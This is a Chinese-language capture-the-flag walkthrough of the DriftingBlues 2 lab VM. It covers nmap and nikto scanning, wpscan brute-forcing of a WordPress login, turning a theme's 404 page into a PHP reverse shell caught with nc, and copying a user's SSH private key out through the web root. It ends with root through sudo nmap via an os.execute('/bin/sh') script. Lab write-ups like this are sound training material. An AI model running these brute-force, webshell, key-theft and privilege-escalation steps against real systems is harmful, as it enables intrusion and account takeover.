driftingblues 2靶机wp

主机探活

nmap -sP 192.168.159.0/24

目标主机IP为：192.168.159.165

端口发现

nmap -sP 192.168.159.0/24

开放端口为：21、22、80端口

21端口

匿名登陆

ftp 192.168.159.165

成功登录

查看，信息收集

发现只有一张图片，下载后也没有发现什么有用的信息，就一普通图片

80端口

nikto

nikto -h 192.168.159.165

发现该网站下有一个 blog，且是 wordpress 搭建的

目录扫描

dirsearch -u 192.168.159.165

扫出了一个 blog 网站，访问一下

发现未加载 css 等信息，猜测有一个域名，浏览源码，找到域名

driftingblues.box

写到本地 hosts文件中，再次访问

对 blog 再做一次目录扫描

http://driftingblues.box/blog/

基本可以确定是 wordpress 了，我对这些路径都进行了访问与信息收集，但是没有获得什么有效信息（只获得了登录页面可以爆破用户名）

wpscan

使用 wpscan 工具来对 wordpress 站点进行扫描（主要就是用来爆破用户名和密码）(也可以用burpsuite爆破，我为了了解下这个工具，所以用工具了)

apt-get install wpscan -y    # 下载
wpscan --help       # 查看参数

wpscan --url http://driftingblues.box/blog -e u
# --url  指定目标url
# -e 爆破模式   -u 爆破用户名

用户名：albert

wpscan --url http://driftingblues.box/blog -e u -P /usr/share/wordlists/rockyou.txt      # 爆破密码

用户名：albert 密码：scotland1

访问http://driftingblues.box/blog/wp-login.php，输入账户密码，成功登录

这个网站提供了网站风格的配置选项，我们查看一下（Appearance --> Theme File Editor）

我们修改它的 404 notfound 页面

改为反弹shll的php代码

本机打开端口监听，并随便访问一个不存在的网址，如：driftingblues.box/blog/index.php/202/17/crosscut-saw/

nc -nlvp 7777

成功获取shell

提权

setuid

find / -perm -u=s -type f 2>/dev/null

没有可以利用的东西。。。

计划任务

crontab -l
cat /etc/crontab

也没有可用信息。。。

sudo

sudo -l

没有可用信息。。。

信息收集

如图，在 /home 目录下找到一个用户，可读可执行

之后在该用户目录中发现存在 ssh 配置文件夹，且可读可执行

进入 .ssh 文件夹，发现存在公私钥信息文件，且私钥文件可读可执行

ssh

将该私钥文件移入web目录下，主机进行下载

cd /var/www/html/blog
cp /home/freddie/.ssh/id_rsa .

wget http://driftingblues.box/blog/id_rsa

ssh远程连接，用户名：freddie

ssh 192.168.159.165 -l freddie -i id_rsa

发现无法成功连接，给出的提示信息时 id_rsa 太 open 了，要求该文件不能被其他文件访问，所以要修改该文件的权限

# 直接把权限改为 400
chmod 400 id_rsa

重新连接，成功登录

sudo-nmap

sudo -l

可以利用 nmap 提权，访问 https://gtfobins.github.io/gtfobins/nmap/ 找到提权方式

选择一个进行提权

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF

成功获取 root 权限

换个友好的命令行

python3 -c 'import pty;pty.spawn("/bin/bash")'

结束！！！